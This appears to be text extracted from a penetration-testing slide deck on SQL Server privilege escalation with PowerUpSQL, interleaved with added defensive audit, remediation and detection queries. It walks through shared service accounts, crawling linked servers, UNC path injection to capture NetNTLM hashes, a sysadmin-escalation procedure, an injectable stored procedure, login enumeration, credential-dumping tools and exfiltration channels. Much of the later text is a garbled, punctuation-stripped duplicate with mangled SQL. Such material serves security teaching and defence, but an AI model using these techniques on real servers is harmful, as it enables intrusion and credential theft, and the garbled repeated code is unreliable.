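-- identity is in sysadmin, and whether xp_cmdshell is on. The same service_account value on
-- many instances is the "one account to rule them all" condition.
SELECT
    @@SERVERNAME                                   AS instance_name,
    s.servicename,
    s.service_account,
    CASE
        WHEN s.service_account LIKE N'NT SERVICE\%'   THEN N'virtual account (per-instance identity)'
        WHEN s.service_account LIKE N'NT AUTHORITY\%' THEN N'built-in account'
        WHEN s.service_account LIKE N'%$'             THEN N'(group) managed service account'
        WHEN s.service_account LIKE N'%\%'            THEN N'domain or local user account: check for reuse across servers'
        ELSE N'local account'
    END                                            AS account_kind,
    ISNULL(IS_SRVROLEMEMBER(N'sysadmin', s.service_account), 0) AS service_account_is_sysadmin,
    c.value_in_use                                 AS xp_cmdshell_enabled
FROM sys.dm_server_services s
CROSS JOIN sys.configurations c
WHERE s.servicename LIKE N'SQL Server (%'          -- the database engine service only
  AND c.name = N'xp_cmdshell';

-- Mitigation direction: one identity per instance (a gMSA or virtual account) so that
-- sysadmin on one server stops being sysadmin on all of them, and xp_cmdshell left off.
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
```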
[Figure: "Leveraging Shared MS SQL Server Service Accounts" network diagram, built up over four slides. Zones: Internet, DMZ and Intranet; ports 80 and 443 reach the DMZ web tier, ports 1433 and 1434 reach the database tier; servers labelled ADS (Active Directory), HVA and LVA. Key: HVA = High Value Application, LVA = Low Value Application. Attacker (Captain Evil, "PURE EVIL") steps: 1 SQL Injection against the LVA; 2 Execute local command via xp_cmdshell; 3 Execute commands and gather data from other database servers via osql, which yields access to the HVA with the shared domain service account.]
Escalating Privileges: Crawling Server Links
Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers.

Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Figure: "Leveraging MS SQL Database links" network diagram, built up over four slides. Same Internet / DMZ / Intranet layout with ports 80 and 443 and ports 1433 and 1434, ADS, HVA and LVA servers; key: HVA = High Value Application, LVA = Low Value Application. DB1 (an LVA) holds two database links into the intranet, one "DB Link with Least Privileges" and one "DB Link with SA account". Attacker (Captain Evil) steps: 1 SQL Injection against DB1; 2 Execute SQL queries and local commands on database servers via nested linked services.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
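An inventory of every linked server and the credential each one uses, added here as an example and not from the original deck, so that links a PUBLIC-role caller could ride as a privileged remote login stand out before anyone crawls them. It reads only sys.servers, sys.linked_logins and sys.server_principals; the link and login names in the remediation comments are placeholders.

```sql
-- Added audit query (not from the original deck). Run on each instance; the results from
-- all instances together give the link graph the slide describes.
SELECT
    s.name                              AS link_name,
    s.data_source,
    s.provider,
    s.is_rpc_out_enabled,               -- 1: EXEC ... AT link works (stored procedures, xp_cmdshell)
    s.is_data_access_enabled,           -- 1: OPENQUERY through the link works
    CASE WHEN ll.local_principal_id = 0 THEN N'<all logins>' ELSE sp.name END AS local_login,
    ll.uses_self_credential,            -- 1: the caller's own Windows credential is forwarded
    ll.remote_name,                     -- fixed remote login the link authenticates as
    CASE
        WHEN ll.server_id IS NULL
            THEN N'no login mapping: remote access fails for every caller'
        WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
            THEN N'HIGH: every local login, public included, reaches the remote as ' + ll.remote_name
        WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 1
            THEN N'MEDIUM: every login is passed through; exposure depends on remote permissions'
        WHEN ll.remote_name = N'sa'
            THEN N'HIGH: a specific login is mapped to sa on the remote'
        ELSE N'review'
    END                                 AS finding
FROM sys.servers s
LEFT JOIN sys.linked_logins ll      ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals sp  ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation sketch for a link that maps all callers to a fixed privileged remote login
-- (link and account names are placeholders): drop the catch-all mapping and map only the
-- logins that need the link, to a remote login with the least privilege that still works.
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @locallogin = NULL;
-- EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'SQLSERVER2', @useself = N'FALSE',
--      @locallogin = N'MyAppUser', @rmtuser = N'link_readonly', @rmtpassword = N'<placeholder>';
-- EXEC sp_serveroption @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
```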
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
• xp_dirtree
• xp_fileexists
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
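The check, the fix and a detection for the two procedures named above, added here as an example and not from the original deck. It runs in master, assumes sysadmin, and uses a placeholder login name for the re-grant and a placeholder file name for the Extended Events target.

```sql
-- Added example (not from the original deck).
USE master;
GO

-- 1. Who holds EXECUTE on the two file-path procedures. On a default install both show
--    an explicit grant to public, which every login inherits.
SELECT o.name AS procedure_name, dp.name AS grantee, dp.type_desc, p.state_desc
FROM sys.database_permissions p
JOIN sys.objects o              ON o.object_id = p.major_id
JOIN sys.database_principals dp ON dp.principal_id = p.grantee_principal_id
WHERE o.name IN (N'xp_dirtree', N'xp_fileexists')
  AND p.permission_name = N'EXECUTE';

-- 2. How far "public" reaches: every login, and Windows groups bring in whole domains.
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')           -- SQL logins, Windows logins, Windows groups
  AND name NOT LIKE N'##%'
ORDER BY type_desc, name;

-- 3. Remediation: remove the default grant; anything that legitimately needs the procedure
--    gets an explicit grant instead of inheriting it through public.
REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree    FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_fileexists FROM public;
-- GRANT EXECUTE ON OBJECT::dbo.xp_dirtree TO [MyAppAdminLogin];   -- placeholder, only if needed

-- 4. Detection: record calls to either procedure whose argument starts with a UNC path.
--    Both the batch and the RPC form are covered; the predicate uses the captured statement text.
CREATE EVENT SESSION [unc_path_in_xp] ON SERVER
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname,
            sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_dirtree%\\%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_fileexists%\\%')),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname,
            sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_dirtree%\\%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_fileexists%\\%'))
ADD TARGET package0.event_file (SET filename = N'unc_path_in_xp.xel');   -- placeholder file name
GO
ALTER EVENT SESSION [unc_path_in_xp] ON SERVER STATE = START;
GO
```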
Escalating Privileges: DEMO
Get-SQLServiceAccountPwHashes
…what? It's self descriptive.

Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Escalating Privileges: OS Admin to SysAdmin

Approach             2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x

Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options

Approach / Common Tools
• Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
• Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
Common Post Exploitation Activities

Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
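A responder's enumeration of the SQL Server layer persistence points listed under step 1 (startup procedures, agent jobs, triggers, modified code), added here as an example and not from the original deck. It assumes sysadmin and uses sys.sp_MSforeachdb, which is undocumented, for the per-database part.

```sql
-- Added hunting query (not from the original deck).
USE master;
SET NOCOUNT ON;

-- 1. Startup procedures: run automatically, as sysadmin, each time the service starts.
SELECT N'startup procedure'                                             AS persistence_type,
       QUOTENAME(SCHEMA_NAME(p.schema_id)) + N'.' + QUOTENAME(p.name)   AS item,
       p.modify_date                                                    AS modify_date
FROM sys.procedures p
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1

UNION ALL
-- 2. Enabled SQL Agent jobs: owner, subsystem and the start of every step's command.
SELECT N'agent job',
       j.name + N' / step ' + CAST(s.step_id AS nvarchar(10))
         + N' [' + s.subsystem + N'] ' + ISNULL(LEFT(s.command, 200), N'')
         + N' (owner ' + ISNULL(SUSER_SNAME(j.owner_sid), N'unknown') + N')',
       j.date_modified
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE j.enabled = 1

UNION ALL
-- 3. Server-scoped DDL and logon triggers (a logon trigger runs on every new connection).
SELECT N'server trigger',
       t.name + CASE WHEN t.is_disabled = 1 THEN N' (disabled)' ELSE N' (enabled)' END,
       t.modify_date
FROM sys.server_triggers t
ORDER BY modify_date DESC;

-- 4. Database-scoped DDL triggers and modules changed in the last 30 days, in every online
--    user database. sp_MSforeachdb is undocumented and has been known to skip databases; a cursor
--    over sys.databases is the supported alternative.
IF OBJECT_ID('tempdb..#db_items') IS NOT NULL DROP TABLE #db_items;
CREATE TABLE #db_items (
    persistence_type nvarchar(40), database_name sysname, item nvarchar(400), modify_date datetime
);
EXEC sys.sp_MSforeachdb N'
IF DB_ID(N''?'') > 4 AND DATABASEPROPERTYEX(N''?'', ''Status'') = ''ONLINE''
BEGIN
    USE [?];
    INSERT INTO #db_items
    SELECT N''database DDL trigger'', DB_NAME(), name, modify_date
    FROM sys.triggers
    WHERE parent_class = 0;                       -- 0 = database scope, 1 = table/view

    INSERT INTO #db_items
    SELECT N''module modified in last 30 days'', DB_NAME(),
           QUOTENAME(SCHEMA_NAME(o.schema_id)) + N''.'' + QUOTENAME(o.name) + N'' ('' + o.type_desc + N'')'',
           o.modify_date
    FROM sys.objects o
    JOIN sys.sql_modules m ON m.object_id = o.object_id
    WHERE o.modify_date > DATEADD(day, -30, GETDATE());
END';
SELECT * FROM #db_items ORDER BY modify_date DESC;
```

Anything in the results that the change record does not explain is the lead to follow; compare module text against source control with OBJECT_DEFINITION before trusting the modify_date alone.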
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
